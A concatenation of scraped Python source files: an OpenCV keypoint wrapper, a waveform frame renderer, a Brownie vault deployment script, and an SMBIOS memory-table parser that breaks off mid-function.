                 nms_diameter: float = 9., normalize_desc: bool = True, root_norm: bool = True,
                 laf_scale_mr_size: Optional[float] = 6.0):
        """Wrap an OpenCV detector/descriptor.

        Args:
            features: OpenCV detector + descriptor (cv2.Feature2D)
            max_keypoints: keep at most this many keypoints by response
                (negative keeps all)
            nms_diameter: diameter for non-maximum suppression
                (stored internally as a radius; non-positive disables NMS)
            normalize_desc: whether to normalize descriptors after description
            root_norm: RootSIFT-like normalization if True, else plain L2
            laf_scale_mr_size: multiplier applied to keypoint size when
                building local affine frames
        """
        self.features = features
        self.max_keypoints = max_keypoints
        self.nms_radius = nms_diameter / 2
        self.normalize_desc = normalize_desc
        self.root_norm = root_norm
        self.laf_scale_mr_size = laf_scale_mr_size
    @staticmethod
    def normalize_descriptors(descriptors: np.ndarray, root_norm: bool = True) -> np.ndarray:
        """
        Normalize descriptors.
        If root_norm=True apply RootSIFT-like normalization, else regular L2 normalization.
        Args:
            descriptors: array (N, 128) with unnormalized descriptors
            root_norm: boolean flag indicating whether to apply RootSIFT-like normalization
        Returns:
            descriptors: array (N, 128) with normalized descriptors
        """
        descriptors = descriptors.astype(np.float32)
        if root_norm:
            # L1 normalize
            norm = np.linalg.norm(descriptors, ord=1, axis=1, keepdims=True)
            descriptors /= norm
            # take square root of descriptors
            descriptors = np.sqrt(descriptors)
        else:
            # L2 normalize
            norm = np.linalg.norm(descriptors, ord=2, axis=1, keepdims=True)
            descriptors /= norm
        return descriptors
    @staticmethod
    def lafs_from_opencv_kpts(kpts: Iterable[cv2.KeyPoint],
                              mr_size: float = 6.0,
                              with_resp: bool = False) -> Union[np.ndarray, Tuple[np.ndarray, np.ndarray]]:
        """
        Convert OpenCV keypoint to Local Affine Frames.
        Adapted from kornia_moons for numpy arrays.
        https://github.com/ducha-aiki/kornia_moons/blob/6aa7bdbe1879303bd9bf35494b383e4f959a1135/kornia_moons/feature.py#L60
        Args:
            kpts: iterable of OpenCV keypoints
            mr_size: multiplier for keypoint size
            with_resp: flag indicating whether to return responses
        Returns:
            lafs: array (N, 2, 3) of local affine frames made from keypoints
            responses (optional): array (N,) of responses corresponding to lafs
        """
        xy = np.array([k.pt for k in kpts], dtype=np.float32)
        scales = np.array([mr_size * k.size for k in kpts], dtype=np.float32)
        angles = np.array([k.angle for k in kpts], dtype=np.float32)
        # if angles are not set, make them 0
        # (OpenCV uses -1 for "orientation not computed")
        if np.allclose(angles, -1.):
            angles = np.zeros_like(scales, dtype=np.float32)
        angles = np.deg2rad(-angles)
        n = xy.shape[0]
        # Each LAF is a 2x3 matrix: [scaled rotation | xy translation].
        lafs = np.empty((n, 2, 3), dtype=np.float32)
        lafs[:, :, 2] = xy
        s_cos_t = scales * np.cos(angles)
        s_sin_t = scales * np.sin(angles)
        lafs[:, 0, 0] = s_cos_t
        lafs[:, 0, 1] = s_sin_t
        lafs[:, 1, 0] = -s_sin_t
        lafs[:, 1, 1] = s_cos_t
        if with_resp:
            resp = np.array([k.response for k in kpts], dtype=np.float32)
            return lafs, resp
        else:
            return lafs
    def detect_and_compute(self, image: np.array) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:
        """
        Detect keypoint with OpenCV-based detector and apply OpenCV-based description.
        Args:
            image: array representation of grayscale image of uint8 data type
        Returns:
            lafs: array (N, 2, 3) of local affine frames created from detected keypoints
            scores: array (N,) of corresponding detector responses
            descriptors: array (N, 128) of descriptors
        """
        kpts, scores, descriptors = detect_kpts_opencv(self.features, image, self.nms_radius, self.max_keypoints,
                                                       describe=True)
        lafs = self.lafs_from_opencv_kpts(kpts, mr_size=self.laf_scale_mr_size, with_resp=False)
        if self.normalize_desc:
            descriptors = self.normalize_descriptors(descriptors, self.root_norm)
        return lafs, scores, descriptors
    def __repr__(self):
        return f'OpenCVFeatures(features={type(self.features)})'
def detect_kpts_opencv(features: cv2.Feature2D, image: np.ndarray, nms_radius: float, max_keypoints: int,
                       describe: bool = False) -> Union[Tuple[np.ndarray, np.ndarray],
                                                        Tuple[np.ndarray, np.ndarray, np.ndarray]]:
    """
    Detect keypoints using OpenCV Detector. Optionally, perform NMS and filter top-response keypoints.
    Optionally perform description.
    Args:
        features: OpenCV based keypoints detector and descriptor
        image: Grayscale image of uint8 data type
        nms_radius: radius of non-maximum suppression. If negative, skip nms
        max_keypoints: maximum number of keypoints to keep based on response. If negative, keep all
        describe: flag indicating whether to simultaneously compute descriptors
    Returns:
        kpts: 1D array of selected cv2.KeyPoint
        responses: array (N,) of detector responses for the selected keypoints
        descriptors: array (N, 128) of descriptors (only when describe=True)
    """
    if describe:
        kpts, descriptors = features.detectAndCompute(image, None)
    else:
        kpts = features.detect(image, None)
    kpts = np.array(kpts)
    responses = np.array([k.response for k in kpts], dtype=np.float32)
    kpts_pt = np.array([k.pt for k in kpts], dtype=np.float32)
    if nms_radius > 0:
        nms_mask = nms_keypoints(kpts_pt, responses, nms_radius)
    else:
        nms_mask = np.ones((kpts_pt.shape[0],), dtype=bool)
    responses = responses[nms_mask]
    kpts = kpts[nms_mask]
    if max_keypoints > 0:
        # argpartition gives the top-k by response without a full sort.
        top_score_idx = np.argpartition(-responses, min(max_keypoints, len(responses) - 1))[:max_keypoints]
    else:
        # select all
        # (Ellipsis as an index keeps every element)
        top_score_idx = ...
    if describe:
        return kpts[top_score_idx], responses[top_score_idx], descriptors[nms_mask][top_score_idx]
    else:
        return kpts[top_score_idx], responses[top_score_idx]
def nms_keypoints(kpts: np.ndarray, responses: np.ndarray, radius: float) -> np.ndarray:
# TODO: add approximate tree
kd_tree = KDTree(kpts)
sorted_idx = np.argsort(-responses)
kpts_to_keep_idx = []
removed_idx = set()
for idx in sorted_idx:
# skip point if it was already removed
if idx in removed_idx:
continue
kpts_to_keep_idx.append(idx)
point = kpts[idx]
neighbors = kd_tree.query_ball_point(point, r=radius)
# Variable `neighbors` contains the `point` itself
removed_idx.update(neighbors)
mask = np.zeros((kpts.shape[0],), dtype=bool)
mask[kpts_to_keep_idx] = True
return mask
| ucuapps/OpenGlue | models/features/opencv/base.py | base.py | py | 6,977 | python | en | code | 304 | github-code | 36 |
9601977492 | from pydub import AudioSegment
import glob
from PIL import Image, ImageDraw
import os
import multiprocessing
import tqdm
import json
import numpy as np
in_path = '/Volumes/AGENTCASHEW/sound-effects-output/'
def process_clip(wave_file_name):
    """Render progressive waveform frames for one clip directory.

    Reads `<dir>/audio.mp3` and `<dir>/meta.json`, peak-detects the samples
    into BARS buckets, then writes one PNG per bar into `<dir>/waveform/`
    (grey background, orange bars filled in progressively). Returns None and
    skips directories that already contain a `waveform` folder.
    """
    print(wave_file_name)
    if os.path.isdir(wave_file_name+'/waveform'):
        return None
    meta = json.load(open(wave_file_name+'/meta.json'))
    print(meta)
    audio = AudioSegment.from_file(wave_file_name+'/audio.mp3')
    # Bug fix: np.fromstring is deprecated (and removed in modern numpy);
    # np.frombuffer is the supported equivalent for raw sample bytes.
    data = np.frombuffer(audio._data, np.int16)
    fs = audio.frame_rate
    BARS = 600
    BAR_HEIGHT = 120
    LINE_WIDTH = 1
    length = len(data)
    RATIO = length/BARS
    count = 0
    maximum_item = 0
    max_array = []
    highest_line = 0
    # Peak-detect: keep the max |sample| of each RATIO-sized bucket.
    for d in data:
        if count < RATIO:
            count = count + 1
            if abs(d) > maximum_item:
                maximum_item = abs(d)
        else:
            max_array.append(maximum_item)
            if maximum_item > highest_line:
                highest_line = maximum_item
            maximum_item = 0
            count = 1
    # Scale so the loudest bucket spans the full bar height.
    line_ratio = highest_line/BAR_HEIGHT
    print(meta['type'],len(max_array))
    # each tick is x number of milliseconds
    tick = int(meta['length']/len(max_array))
    print('tick is',tick)
    im = Image.new('RGBA', (BARS * LINE_WIDTH, BAR_HEIGHT), (255, 255, 255, 0))
    draw = ImageDraw.Draw(im)
    current_x = 1
    # First pass: draw the full waveform in grey as the background.
    for item in max_array:
        item_height = item/line_ratio
        current_y = (BAR_HEIGHT - item_height)/2
        draw.line((current_x, current_y, current_x, current_y + item_height), fill=(158, 158, 158), width=0)
        current_x = current_x + LINE_WIDTH
    os.mkdir(wave_file_name+'/waveform')
    current_x = 1
    # Second pass: overdraw bars in orange one at a time, saving a frame per
    # bar so the PNG sequence plays back as a progress animation.
    for idx, item in enumerate(max_array):
        item_height = item/line_ratio
        current_y = (BAR_HEIGHT - item_height)/2
        draw.line((current_x, current_y, current_x, current_y + item_height), fill=(255, 87, 34), width=0)
        current_x = current_x + LINE_WIDTH
        im.save(f"{wave_file_name}/waveform/{idx}.png")
# Fan the clip directories out over 8 worker processes.
the_pool = multiprocessing.Pool(8)
path, dirs, files = os.walk(in_path).__next__()
# NOTE(review): `total` counts the *files* directly under in_path, while the
# work items are every entry matched by the glob — confirm the two counts
# agree, otherwise the progress bar total will be off.
for result in tqdm.tqdm(the_pool.imap_unordered(process_clip, glob.iglob(in_path+'*')), total=len(files)):
    pass
| thisismattmiller/sound-effect-bot | build_waveform_frames.py | build_waveform_frames.py | py | 2,125 | python | en | code | 0 | github-code | 36 |
34084783842 | from pathlib import Path
from brownie import Strategy, accounts, config, network, project, web3
from brownie.network.gas.strategies import GasNowStrategy
from brownie.network import gas_price
from eth_utils import is_checksum_address
API_VERSION = config["dependencies"][0].split("@")[-1]
Vault = project.load(
Path.home() / ".brownie" / "packages" / config["dependencies"][0]
).Vault
#1INCH token
WANT_TOKEN = "0x111111111117dC0aa78b770fA6A738034120C302"
STRATEGIST_ADDR = "0xAa9E20bAb58d013220D632874e9Fe44F8F971e4d"
#Deployer as governance
GOVERNANCE = STRATEGIST_ADDR
#Rewards to deployer,we can change it to yearn governance after approval
REWARDS = STRATEGIST_ADDR
#Set gas price as fast
gas_price(62 * 1e9)
def get_address(msg: str) -> str:
    """Prompt (repeatedly) until a checksummed address or resolvable ENS
    name is entered; return the checksummed address.
    """
    while True:
        val = input(msg)
        if is_checksum_address(val):
            return val
        else:
            # Not a raw address — try to resolve it as an ENS name.
            addr = web3.ens.address(val)
            if addr:
                print(f"Found ENS '{val}' [{addr}]")
                return addr
        print(f"I'm sorry, but '{val}' is not a checksummed address or ENS")
def main():
    """Deploy (or attach to) the Vault and Strategy, wire them together and
    set the deposit limit. Interactive: prompts on stdin for reuse choices.
    """
    print(f"You are using the '{network.show_active()}' network")
    dev = accounts.load("dev")
    print(f"You are using: 'dev' [{dev.address}]")
    if input("Is there a Vault for this strategy already? y/[N]: ").lower() == "y":
        vault = Vault.at(get_address("Deployed Vault: "))
        assert vault.apiVersion() == API_VERSION
    else:
        #Deploy vault
        vault = Vault.deploy({"from": dev})
        vault.initialize(
            WANT_TOKEN,#OneInch token as want token
            GOVERNANCE,#governance
            REWARDS,#rewards
            "",#nameoverride
            "",#symboloverride
            {"from": dev}
        )
        print(API_VERSION)
        assert vault.apiVersion() == API_VERSION
    print(
        f"""
    Strategy Parameters
       api: {API_VERSION}
     token: {vault.token()}
      name: '{vault.name()}'
    symbol: '{vault.symbol()}'
    """
    )
    if input("Deploy Strategy? [y]/n: ").lower() == "n":
        strategy = Strategy.at(get_address("Deployed Strategy: "))
    else:
        strategy = Strategy.deploy(vault, {"from": dev}, publish_source=True)
    #add strat to vault
    vault.addStrategy(strategy, 10_000, 0, 0, {"from": dev})
    #Set deposit limit to 5000 1INCH tokens
    vault.setDepositLimit(5000 * 1e18)
| akshaynexus/BoringDAOStrats | scripts/deploy.py | deploy.py | py | 2,398 | python | en | code | 2 | github-code | 36 |
3473904633 | import copy
import ctypes
import os
import pprint
import struct
import sys
from sys_utils import run, FIND_LIBRARY_CMD, MEMKIND_LIBRARY
RUNNING_UT = False
MESSAGE_UNAVAILABLE = "Not Available"
MESSAGE_AVAILABLE = "Available"
MESSAGE_NOT_RESERVED = "Unable to reserve {0} memory"
# dmi_sysfs global variables
DMI_SYSFS_ROOT = "/sys/firmware/dmi/entries"
DMI_FILENAME = DMI_SYSFS_ROOT + "/{0}/raw"
DMI_GROUP_ASSOCIATIONS_TYPE = "14-{0}"
DMI_GROUP_STRING = "Group: "
DMI_SYS_KNL_GROUP_NAME = "Knights Landing Information"
DMI_SYS_KNM_GROUP_NAME = "Knights Mill Information"
DMI_SYS_GENERAL_INFO_TYPE = "{0}-0"
# smbios enum values
TYPE_16_LOCATION_OTHER = 0x01
TYPE_16_LOCATION_SYSTEM = 0x03
TYPE_16_USE_SYSTEM = 0x03
TYPE_16_USE_CACHE = 0x07
TYPE_17_FORM_FACTOR_CHIP = 0x05
TYPE_17_TYPE_DETAIL_CACHE_DRAM = 0x800
class DMITable(object):
    """Base class for Table Type objects.

    Walks /sys/firmware/dmi/entries for raw SMBIOS tables of a given type
    and lets subclasses parse each file via _process_dmi_file.
    """
    def __init__(self, table_type):
        # SMBIOS structure type number (e.g. 16, 17).
        self.table_type = table_type
        # One dict per parsed table instance, filled by _process_dmi_file.
        self.entries = list()
        self._process_dmi_table()
    def __iter__(self):
        for entry in self.entries:
            yield entry
    def __len__(self):
        return len(self.entries)
    def _process_dmi_table(self):
        """Function that reads dmi table information.

        Opens every "<type>-<instance>/raw" file under the dmi sysfs root
        and delegates parsing to the subclass. Raises DMIException on any
        failure.
        """
        fd = None
        table_file_format = "{0}-".format(os.path.join(DMI_SYSFS_ROOT, str(self.table_type)))
        for top_dir, _, _ in os.walk(DMI_SYSFS_ROOT):
            if not top_dir.startswith(table_file_format):
                continue
            file_name = os.path.join(top_dir, "raw")
            try:
                fd = os.open(file_name, os.O_RDONLY)
                self._process_dmi_file(fd)
            except (OSError, NameError) as e:
                err_msg = "Error processing DMI Type {0}: {1}\n".format(self.table_type, e)
                raise DMIException(err_msg)
            except:
                err_msg = "Unknown Error while processing DMI Type {0}: {1}\n".format(self.table_type, sys.exc_info()[0])
                raise DMIException(err_msg)
            finally:
                if fd:
                    os.close(fd)
    def _process_dmi_file(self, fd):
        """Function needs to be implemented by child classes
        """
        raise NotImplementedError
    def _get_strings_info(self, fd, length):
        """Return the string-set that follows the formatted area of a table.

        Per the SMBIOS spec, the string-set starts at offset `length` and is
        a sequence of NUL-terminated strings; a double NUL terminates the
        set. A leading "" sentinel is kept at index 0 so that 1-based string
        references from the formatted area index directly into the list.
        """
        strings = ["",]
        chars = list()
        null_found = False
        os.lseek(fd, length, os.SEEK_SET)
        while True:
            char = struct.unpack('1B', os.read(fd, 1))[0]
            if not char:
                if chars:
                    strings.append("".join(chars))
                    chars[:] = []
                if null_found:
                    break;
                null_found = True
                continue;
            null_found = False
            chars.append(chr(char))
        return strings
class DMITableType16(DMITable):
    """Class that reads DMI Table Type 16 (Physical Memory Array)."""
    def __init__(self):
        DMITable.__init__(self, 16)
    def __str__(self):
        header = "\tTable Type 16 Content (Num Ele: {0}): \n".format(len(self.entries))
        footer = "\tEnding table Type 16.\n"
        contents =list()
        for entry in self.entries:
            entry_contents = (
                "Type: {0}\n"
                "Length: {1}\n"
                "Handle: {2}\n"
                "Location: {3}\n"
                "Use: {4}\n"
                "Mem Err Corr: {5}\n"
                "MaxCap: {6}\n"
                "Mem Err Inf: {7}\n"
                "Num Mem Dev: {8}\n"
                "Ext Max Cap: {9}\n\n").format(entry["table_type"],
                                               hex(entry["lenght"]),
                                               hex(entry["handle"]),
                                               hex(entry["location"]),
                                               hex(entry["use"]),
                                               hex(entry["mem_err_corr"]),
                                               entry["max_cap"],
                                               hex(entry["mem_err_inf"]),
                                               entry["num_mem_dev"],
                                               entry["ext_max_cap"])
            contents.append(entry_contents)
        contents_str = "".join(contents)
        output = "{0} {1} {2}".format(header, contents_str, footer)
        return output
    def _process_dmi_file(self, fd):
        """Parse one raw Type 16 structure (fixed-layout fields, then the
        trailing string-set) and append it to self.entries.
        """
        os.lseek(fd, 0, os.SEEK_SET)
        table_type = struct.unpack('1B', os.read(fd, 1))[0]
        length = struct.unpack('1B', os.read(fd, 1))[0]
        handle = struct.unpack('1H', os.read(fd, 2))[0]
        location = struct.unpack('1B', os.read(fd, 1))[0]
        use = struct.unpack('1B', os.read(fd, 1))[0]
        mem_err_corr = struct.unpack('1B', os.read(fd, 1))[0]
        max_cap = struct.unpack('1I', os.read(fd, 4))[0]
        mem_err_inf = struct.unpack('1H', os.read(fd, 2))[0]
        num_mem_dev = struct.unpack('1H', os.read(fd, 2))[0]
        ext_max_cap = struct.unpack('1Q', os.read(fd, 8))[0]
        strings = self._get_strings_info(fd, length)
        # NOTE: the "lenght" key is misspelled but kept as-is — __str__ and
        # possibly external consumers read it under that spelling.
        self.entries.append({"table_type": table_type,
                             "lenght": length,
                             "handle": handle,
                             "location": location,
                             "use": use,
                             "mem_err_corr": mem_err_corr,
                             "max_cap": max_cap, # In KB
                             "mem_err_inf": mem_err_inf,
                             "num_mem_dev": num_mem_dev, # if value = 0xFFFE no error information
                             "ext_max_cap": ext_max_cap}) # Only available if max_cap = 0x80000000. in B
class DMITableType17(DMITable):
    """Class that reads DMI Table Type 17 (Memory Device).

    Each parsed entry describes one memory module slot (possibly empty).
    Fields that are string references are resolved against the table's
    trailing string section via _get_strings_info().
    """
    def __init__(self):
        # Register this parser for SMBIOS table type 17.
        DMITable.__init__(self, 17)
    def __str__(self):
        """Render every parsed Type 17 entry as an indented text dump."""
        header = "\tTable Type 17 Content (Num Ele: {0}): \n".format(len(self.entries))
        footer = "\tEnding table Type 17.\n"
        contents = list()
        for entry in self.entries:
            entry_contents = (
                "Type: {0}\n"
                "Length: {1}\n"
                "Handle: {2}\n"
                "Phys Memory Loc: {3}\n"
                "Mem Error Inf: {4}\n"
                "Total Width: {5}\n"
                "Data Width: {6}\n"
                "Size: {7}\n"
                "Form Factor: {8}\n"
                "Device Set: {9}\n"
                "Device Locator: {10}\n"
                "Bank Locator: {11}\n"
                "Memory Type: {12}\n"
                "Type Detail: {13}\n"
                "Speed: {14}\n"
                "Manufacturer: {15}\n"
                "Serial Number: {16}\n"
                "Asset Tag: {17}\n"
                "Part Number: {18}\n"
                "Attributes: {19}\n"
                "Ext Size: {20}\n"
                "Conf Memory Speed: {21}\n"
                "Min Volt: {22}\n"
                "Max Volt: {23}\n"
                "Conf Volt: {24}\n\n").format(entry["table_type"],
                                              hex(entry["length"]),
                                              hex(entry["handle"]),
                                              entry["phys_mem"],
                                              hex(entry["mem_err_info"]),
                                              entry["total_width"],
                                              entry["data_width"],
                                              entry["size"],
                                              hex(entry["form_factor"]),
                                              hex(entry["dev_set"]),
                                              entry["dev_locator"],
                                              entry["bank_locator"],
                                              hex(entry["mem_type"]),
                                              hex(entry["type_det"]),
                                              entry["speed"],
                                              entry["manufacturer"],
                                              entry["serial_num"],
                                              entry["asset_tag"],
                                              entry["part_num"],
                                              hex(entry["attributes"]),
                                              hex(entry["ext_size"]),
                                              entry["conf_mem_speed"],
                                              entry["min_volt"],
                                              entry["max_volt"],
                                              entry["conf_volt"])
            contents.append(entry_contents)
        contents_str = "".join(contents)
        output = "{0} {1} {2}".format(header, contents_str, footer)
        return output
    def _process_dmi_file(self, fd):
        """ Function that parses information from DMI File Type 17

        Reads the fixed-layout fields from `fd` in declaration order; the
        sequence of os.read() calls below must match the SMBIOS Type 17
        structure layout exactly, so do not reorder them.
        String-typed fields (locators, manufacturer, etc.) hold indices
        into the string section returned by _get_strings_info().
        """
        os.lseek(fd, 0, os.SEEK_SET)
        table_type = struct.unpack('1B', os.read(fd, 1))[0]
        length = struct.unpack('1B', os.read(fd, 1))[0]
        handle = struct.unpack('1H', os.read(fd, 2))[0]
        phys_mem = struct.unpack('1H', os.read(fd, 2))[0]
        mem_err_info = struct.unpack('1H', os.read(fd, 2))[0]
        total_width = struct.unpack('1H', os.read(fd, 2))[0]
        data_width = struct.unpack('1H', os.read(fd, 2))[0]
        size = struct.unpack('1H', os.read(fd, 2))[0]
        form_factor = struct.unpack('1B', os.read(fd, 1))[0]
        dev_set = struct.unpack('1B', os.read(fd, 1))[0]
        dev_locator = struct.unpack('1B', os.read(fd, 1))[0]
        bank_locator = struct.unpack('1B', os.read(fd, 1))[0]
        mem_type = struct.unpack('1B', os.read(fd, 1))[0]
        type_det = struct.unpack('1H', os.read(fd, 2))[0]
        speed = struct.unpack('1H', os.read(fd, 2))[0]
        manufacturer = struct.unpack('1B', os.read(fd, 1))[0]
        serial_num = struct.unpack('1B', os.read(fd, 1))[0]
        asset_tag = struct.unpack('1B', os.read(fd, 1))[0]
        part_num = struct.unpack('1B', os.read(fd, 1))[0]
        attributes = struct.unpack('1B', os.read(fd, 1))[0]
        ext_size = struct.unpack('1I', os.read(fd, 4))[0]
        conf_mem_speed = struct.unpack('1H', os.read(fd, 2))[0]
        min_volt = struct.unpack('1H', os.read(fd, 2))[0]
        max_volt = struct.unpack('1H', os.read(fd, 2))[0]
        conf_volt = struct.unpack('1H', os.read(fd, 2))[0]
        strings = self._get_strings_info(fd, length)
        # NOTE(review): SMBIOS string numbers are 1-based; confirm that
        # _get_strings_info() compensates for the 0-based indexing used here.
        self.entries.append({"table_type": table_type,
                             "length": length,
                             "handle": handle,
                             "phys_mem": phys_mem,
                             "mem_err_info": mem_err_info,
                             "total_width": total_width,
                             "data_width": data_width,
                             # size Value Note:
                             # if Bit15 = 0 units are MB, else units are KB.
                             # if value = 0x7FFF atual size is in "ext_size"
                             # if value = 0xFFFF size unknown.
                             "size": size,
                             "form_factor": form_factor,
                             "dev_set": dev_set,
                             "dev_locator": strings[dev_locator].strip() if dev_locator < len(strings) else "",
                             "bank_locator": strings[bank_locator].strip() if bank_locator < len(strings) else "",
                             "mem_type": mem_type,
                             "type_det": type_det,
                             "speed": speed,  # In MHz
                             "manufacturer": strings[manufacturer].strip() if manufacturer < len(strings) else "",
                             "serial_num": strings[serial_num].strip() if serial_num < len(strings) else "",
                             "asset_tag": strings[asset_tag].strip() if asset_tag < len(strings) else "",
                             "part_num": strings[part_num].strip() if part_num < len(strings) else "",
                             "attributes": attributes,
                             "ext_size": ext_size,  # Only usable if size value = 0x7FFF. In MB
                             "conf_mem_speed": conf_mem_speed,
                             "min_volt": min_volt,  # In mV
                             "max_volt": max_volt,  # In mV
                             "conf_volt": conf_volt})  # In mV
class DMITableFactory(object):
    """Factory that instantiates DMI table parsers by table type.

    Only SMBIOS tables 16 and 17 are currently supported.
    """
    supported_types = {
        16: DMITableType16,
        17: DMITableType17,
    }

    @staticmethod
    def get_table(table_type):
        """Return a new parser for `table_type`, or raise DMIException."""
        if table_type not in DMITableFactory.supported_types:
            message = "Table Type {0} is not supported!\n".format(table_type)
            sys.stderr.write(message)
            raise DMIException(message)
        return DMITableFactory.supported_types[table_type]()
class Dimm(object):
    """Class that stores the DIMM information needed.

    Decodes a single SMBIOS Type 17 entry dict (as produced by
    DMITableType17) into memory type, MCDRAM usage, size, speed and
    configured voltage.
    """
    def __init__(self, entry):
        self.type = MemType.UNKNOWN
        self.mcdram_use = MCDRAMUse.UNKNOWN
        self.size = 0  # In MB
        self.speed = 0  # In MHz
        self.conf_volt = 0  # In mV
        # MCDRAM is soldered on-package: form factor "chip", or the device
        # locator string mentions it explicitly.
        if entry["form_factor"] == TYPE_17_FORM_FACTOR_CHIP or "mcdram" in entry["dev_locator"].lower():
            self.type = MemType.MCDRAM
            if entry["type_det"] & TYPE_17_TYPE_DETAIL_CACHE_DRAM:
                self.mcdram_use = MCDRAMUse.CACHE
            else:
                self.mcdram_use = MCDRAMUse.SYSTEM
        else:
            self.type = MemType.DIMM
            self.mcdram_use = MCDRAMUse.UNKNOWN
        # SMBIOS Type 17 "Size" encoding:
        #   0xFFFF -> unknown; 0x7FFF -> real size is in ext_size;
        #   bit 15 set -> bits 14:0 hold the size in KB, otherwise in MB.
        if entry["size"] == 0xFFFF:
            self.size = 0
        elif entry["size"] == 0x7FFF:
            self.size = entry["ext_size"]
        elif entry["size"] & 0x8000:
            # Fix: mask off the KB-units flag (bit 15) before converting —
            # the raw value would otherwise add a spurious 32 MB. Floor
            # division keeps the result an int on Python 3 as well.
            self.size = (entry["size"] & 0x7FFF) // 1024
        else:
            self.size = entry["size"]
        self.speed = entry["speed"]
        self.conf_volt = entry["conf_volt"]
class MemoryTopology(object):
    """In-memory view of the platform memory layout.

    Reads SMBIOS/DMI tables 16 and 17 to build one Dimm object per memory
    module (including empty slots); the Dimm list can be iterated directly.
    Also reads the dmi-sysfs group-association entries to obtain the
    Memory, Cluster and MCDRAM Cache configuration modes.
    """
    def __init__(self, args):
        self.args = args
        self.dimms = list()
        # Aggregated MCDRAM sizes (MB) as reported by Table 16.
        self.mcdram_cache = 0
        self.mcdram_system = 0
        # BIOS configuration modes; stay "Unavailable" if dmi-sysfs
        # information cannot be read.
        self.cluster_mode = "Unavailable"
        self.memory_mode = "Unavailable"
        self.mem_MCDRAM_cache_info = "Unavailable"
        self._read_memory_information()
        self._read_configuration_modes()
    def __iter__(self):
        # Iterate over the parsed Dimm objects.
        for dimm in self.dimms:
            yield dimm
    def __len__(self):
        return len(self.dimms)
    def __str__(self):
        return pprint.pformat(self.dimms)
    def _read_memory_information(self):
        """Function that obtains the Memory Information and stores it in a list
        of dictionaries, each containing the information for one handle of the
        memory.

        Table 16 provides aggregate MCDRAM cache/system capacity;
        Table 17 provides one entry per module (turned into Dimm objects).
        """
        self.mcdram_cache = 0
        self.mcdram_system = 0
        try:
            table_16_info = DMITableFactory.get_table(16)
            table_17_info = DMITableFactory.get_table(17)
        except DMIException as e:
            sys.stderr.write("Error obtaining SMBIOS table information: {0}\n".format(e))
            return
        if not RUNNING_UT and self.args.verbosity >= 4:  # If the debug level is high enough, print SMBIOS tables
            sys.stdout.write(str(table_16_info))
            sys.stdout.write(str(table_17_info))
        for entry in table_16_info:
            if entry["location"] == TYPE_16_LOCATION_OTHER:
                # max_cap == 0x80000000 means the real capacity is in
                # ext_max_cap (bytes); otherwise max_cap is in KB.
                if entry["max_cap"] == 0x80000000:
                    mcdram_mem = entry["ext_max_cap"] / (1024 * 1024)  # Value in Bytes, convert it to MB
                else:
                    mcdram_mem = entry["max_cap"] / 1024  # Value in KB, convert it to MB
                if entry["use"] == TYPE_16_USE_SYSTEM:
                    self.mcdram_system += mcdram_mem
                if entry["use"] == TYPE_16_USE_CACHE:
                    self.mcdram_cache += mcdram_mem
            else:
                continue
        for entry in table_17_info:
            self.dimms.append(Dimm(entry))
    def _read_configuration_modes(self):
        # Walk the numbered group-association files until one is missing
        # or matches the Knights Landing group (return value != 1).
        type_file_num = 0
        while True:
            if self._process_dmi_group_file(
                    DMI_FILENAME.format(DMI_GROUP_ASSOCIATIONS_TYPE.format(type_file_num))) == 1:
                type_file_num += 1
            else:
                break
    def _process_dmi_group_file(self, filename):
        """Inspect one dmi-sysfs group-association file.

        Returns 1 when the group is not a Knights Landing group (caller
        tries the next file), 2 on error, 0 otherwise.
        """
        fd = None
        try:
            fd = os.open(filename, os.O_RDONLY)
            type = struct.unpack('1B', os.read(fd, 1))[0]
            length = struct.unpack('1B', os.read(fd, 1))[0]
            os.lseek(fd, length, os.SEEK_SET)
            name_str = os.read(fd, (len(DMI_GROUP_STRING) + max(len(DMI_SYS_KNL_GROUP_NAME), len(DMI_SYS_KNM_GROUP_NAME))))
            if DMI_SYS_KNL_GROUP_NAME not in name_str and \
                    DMI_SYS_KNM_GROUP_NAME not in name_str:
                return 1
            # Each group member is 3 bytes (1-byte type, 2-byte handle)
            # after the 5-byte header.
            # NOTE(review): `/` assumes Python 2 integer division — under
            # Python 3 this yields a float and range() below would fail.
            members = (length - 5) / 3
            os.lseek(fd, 5, os.SEEK_SET)
            for x in range(0, members):
                grp_type = struct.unpack('1B', os.read(fd, 1))[0]
                grp_handle = struct.unpack('1H', os.read(fd, 2))[0]
                # Stop after the first member file processed successfully.
                if self._process_dmi_member_file(DMI_FILENAME.format(DMI_SYS_GENERAL_INFO_TYPE.format(grp_type))) == 0:
                    break
        except OSError as e:
            sys.stderr.write("Group Knights Landing Information not found on DMI sysfs: {0}\n".format(e))
            return 2
        except:
            sys.stderr.write(
                "Unknown Error detected while getting Knights Landing Information Group from DMI sysfs: {0}\n".format(
                    sys.exc_info()[0]))
            return 2
        finally:
            # NOTE(review): fd == 0 is a valid descriptor but falsy, and
            # would not be closed here.
            if fd:
                os.close(fd)
        return 0
    def _process_dmi_member_file(self, filename):
        """Read one Knights Landing member file and record the configured
        cluster/memory/MCDRAM-cache modes.

        Returns 0 on success, 1 if the member id does not match, 2 on error.
        """
        grp_fd = None
        try:
            grp_fd = os.open(filename, os.O_RDONLY)
            os.lseek(grp_fd, 4, os.SEEK_SET)
            member_id = struct.unpack('1B', os.read(grp_fd, 1))[0]
            if member_id != 0x0001:
                return 1
            os.lseek(grp_fd, 7, os.SEEK_SET)
            supported_cluster_mode = struct.unpack('1B', os.read(grp_fd, 1))[0]
            conf_cluster_mode = struct.unpack('1B', os.read(grp_fd, 1))[0]
            supported_memory_mode = struct.unpack('1B', os.read(grp_fd, 1))[0]
            conf_memory_mode = struct.unpack('1B', os.read(grp_fd, 1))[0]
            conf_MCDRAM_cache = struct.unpack('1B', os.read(grp_fd, 1))[0]
            self.cluster_mode = self._cluster_mode(conf_cluster_mode)
            self.memory_mode = self._memory_mode(conf_memory_mode)
            self.mem_MCDRAM_cache_info = self._memory_MCDRAM_cache(conf_MCDRAM_cache)
        except OSError as e:
            sys.stderr.write("Member Knights Landing Information not found on DMI sysfs: {0}\n".format(e))
            return 2
        except:
            sys.stderr.write(
                "Unknown Error detected while getting Knights Landing Information Member from DMI sysfs: {0}\n".format(
                    sys.exc_info()[0]))
            return 2
        finally:
            # NOTE(review): same falsy-0 caveat as _process_dmi_group_file.
            if grp_fd:
                os.close(grp_fd)
        return 0
    def _cluster_mode(self, value):
        # Decode the configured cluster-mode flag byte.
        if value == 0x01:
            cluster_mode = "Quadrant"
        elif value == 0x02:
            cluster_mode = "Hemisphere"
        elif value == 0x04:
